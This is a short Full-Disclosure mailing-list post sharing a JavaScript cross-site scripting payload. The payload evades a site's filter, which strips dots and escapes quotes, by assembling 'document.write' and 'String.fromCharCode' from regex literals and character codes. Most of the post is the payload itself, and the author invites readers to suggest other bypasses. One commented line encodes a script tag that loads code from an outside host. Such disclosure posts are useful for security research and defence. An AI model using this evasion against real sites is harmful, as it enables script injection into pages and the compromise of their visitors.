xss dot(.) filter evasion

["Thomas Pollet" <thomas.pollet () gmail com>]

Hello,

I came across this site that implemented some filtering so the dots were
replaced by an underscore, also the quotes and backslash were escaped.
I came up with the code below to bypass this filtering (write anything to
the page using String.fromCharCode)
Someone knows a different way to do this?

<html>
 <head>
   <title>
   </title>
 </head>
 <body>
<script>
function write(str){
   //document.write() doesn't work as it becomes document_write()
   var s = /write/;
   var w = String();
   var n = String();
   w += s;
   //cast to string so we can index
   w += s;
   n += w[1] + w[2] + w[3] + w[4] + w[5];
   //call document['write']
   document[n](str);
}
var s = /fromCharCode/;
var w = String();
var n = String();
w += s;
n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
w[11] + w[12];

write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
62,104,60,47,97,62));

/*
write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
,111,109,34,62));
*/

</script>
 </body>
</html>

Regards,
Thoms Pollet

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/